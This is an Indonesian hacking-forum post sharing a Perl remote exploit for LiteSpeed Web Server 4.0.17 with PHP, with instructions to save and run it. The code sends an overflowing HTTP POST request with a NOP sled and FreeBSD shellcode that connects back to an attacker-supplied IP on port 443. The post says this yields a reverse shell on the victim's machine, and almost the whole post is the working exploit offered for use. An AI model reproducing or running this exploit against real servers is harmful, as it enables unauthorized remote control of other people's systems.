LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit

Tempat pembahasan dan tutorial penggunaan tools untuk hacking, security dan forensik komputer.

Moderators: Paman, Xshadow, indounderground

Forum rules
Tool yang diupload oleh member tidak diperiksa oleh kami, mungkin saja terinfeksi oleh malware secara disengaja ataupun tidak, saran kami sebaiknya mendownload tool tersebut dari sumber pembuatnya. Bagi yang buat thread diharapkan menampilkan screenshot tool.
Post Reply
User avatar
Digital Cat
Posts: 437
Joined: Fri Jun 26, 2009 6:13 pm
Location: USA
Contact:

LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit

Post by Digital Cat » Tue Jan 10, 2012 10:43 pm

Image


Tool lawas yang mungkin masih berguna..

wat hacking teman2x..

Copy paste di notepad and save as (.pl) / litespeed-remote.pl

and jangan lupa instal dulu perl / kalo saya menggunakan Strawberry Perl

jika binggung dimana harus download mampir ja ke situs Strawberry Perl for Windows
strawberryperl.com

berikut code :

Code: Select all

use IO::Socket;
 
$|=1;
 
#freebsd reverse shell port 443
#setup a netcat on this port ^^
$bsdcbsc =
        # setreuid, no root here
        "\x31\xc0\x31\xc0\x50\x31\xc0\x50\xb0\x7e\x50\xcd\x80".
        # connect back :>
        "\x31\xc0\x31\xdb\x53\xb3\x06\x53".
        "\xb3\x01\x53\xb3\x02\x53\x54\xb0".
        "\x61\xcd\x80\x31\xd2\x52\x52\x68".
        "\x41\x41\x41\x41\x66\x68\x01\xbb".
        "\xb7\x02\x66\x53\x89\xe1\xb2\x10".
        "\x52\x51\x50\x52\x89\xc2\x31\xc0".
        "\xb0\x62\xcd\x80\x31\xdb\x39\xc3".
        "\x74\x06\x31\xc0\xb0\x01\xcd\x80".
        "\x31\xc0\x50\x52\x50\xb0\x5a\xcd".
        "\x80\x31\xc0\x31\xdb\x43\x53\x52".
        "\x50\xb0\x5a\xcd\x80\x31\xc0\x43".
        "\x53\x52\x50\xb0\x5a\xcd\x80\x31".
        "\xc0\x50\x68\x2f\x2f\x73\x68\x68".
        "\x2f\x62\x69\x6e\x89\xe3\x50\x54".
        "\x53\x50\xb0\x3b\xcd\x80\x31\xc0".
        "\xb0\x01\xcd\x80";
 
sub usage() {
        print "written by kingcope\n";
        print "usage:\n".
                  "litespeed-remote.pl <target ip/host> <target port>
<your ip> <php file on remote host>\n\n".
                  "example:\n".
                  "perl litespeed-remote.pl 192.168.2.3 8088
192.168.2.2 phpinfo.php\n\n";
 
        exit;
}
 
if ($#ARGV ne 3) { usage; }
 
$target = $ARGV[0];
$port = $ARGV[1];
$cbip = $ARGV[2];
$file = $ARGV[3];
 
($a1, $a2, $a3, $a4) = split(//, gethostbyname("$cbip"));
 
substr($bsdcbsc, 37, 4, $a1 . $a2 . $a3 . $a4);
 
#my $sock = IO::Socket::INET->new(PeerAddr => $target,
#                                 PeerPort => 8088,
#                                         Proto    => 'tcp');
#$a = "A" x 500;
#print $sock "POST /phpinfo.php HTTP/1.1\r\nHost: 192.168.2.5\r\n\r\n";
 
#$x = <stdin>;
 
#$ret = pack("V", 0x28469478); # FreeBSD 7.3-RELEASE
#$ret = pack("V", 0x82703c0); # FreeBSD 6.3-RELEASE
$ret = pack("V", 0x080F40CD); # JMP EDX lsphp
 
my $sock = IO::Socket::INET->new(PeerAddr => $target,
                                  PeerPort => $port,
                                          Proto    => 'tcp');
 
 
$a = "A" x 263 . "AAAA" x 6 . $ret . "C" x 500;
$sc = "\x90" x 3000 . $bsdcbsc;
 
print $sock "POST /\x90\x90\x90\x90\x90\x90\xeb\x50/../$file?
HTTP/1.1\r\nHost: $target\r\nVVVV: $sc\r\n$a KINGCOPEH4XXU:\r\n\r\n";
 
while (<$sock>) {
    print;
}
apa yang bisa di maanfaain dari tool ini , kita bisa mendapatkan reverse shell ke mesin korban.

Post Reply

Return to “Tools For Hacking - Security & Computer Forensic”